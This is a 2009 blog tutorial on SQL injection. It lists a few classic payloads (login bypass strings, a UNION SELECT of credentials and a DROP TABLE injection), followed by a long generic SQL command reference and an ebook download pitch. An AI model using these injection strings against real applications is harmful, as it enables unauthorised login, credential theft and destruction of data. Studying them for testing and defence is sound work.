Tips and tips for advance sql injection

by Black on July 29, 2009

in Security Reconnaissance, Tutorials

Sql injection Tips and tricks, some commands you should know to go deep in SQL injections.
when you use basic sql injection tool or sql fuzzer use this commands to edit and inser and run the tool. View your output and keep testing.

‘OR ” = ‘ Allows authentication without a valid username.
admin’– Authenticate as user admin without a password.
‘ union select 1, ‘user’, ‘pass’ 1– Requires knowledge of column names.
‘; drop table users– DANGEROUS! this will delete the user database if the table name is ‘users’.
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
show processlist — view running process

In next version of this sql injection tutorial we will try to add and segregate according to database names.

Ebook to help you in advance SQL injection techniques.

Download Advance sql injection techniques Here

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